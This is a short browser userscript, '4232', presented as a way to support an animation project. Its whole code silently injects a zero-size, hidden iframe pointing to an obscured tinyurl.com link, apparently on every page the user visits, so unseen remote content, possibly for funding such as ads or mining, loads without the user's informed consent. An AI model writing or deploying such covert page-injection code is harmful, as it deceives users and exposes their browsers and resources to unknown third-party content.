// ==UserScript== // @name 4232 // @description Colaborar con el Proyecto 4232 // @version 1 // @grant none // @lang es // @author Ernesto Bazzano (bazza) // @license AGPL-v3.0+ // @copyright 2018 // @updateURL https://download.tuxfamily.org/4232/4232.user.js // @icon https://download.tuxfamily.org/4232/wordpress//2016/06/cropped-bg_baner-150x150.png // @namespace animacion arte corto financiamiento anime cortometraje dibujo ayuda softwarelibre // ==/UserScript== var ifrm = document.createElement("iframe"); ifrm.setAttribute("src", "https://tinyurl.com/lue7ezooyo3Es7TeHoaquae6Ruj6ph"); ifrm.style.width = "0"; ifrm.style.height = "0"; ifrm.style.display = "none"; document.body.appendChild(ifrm);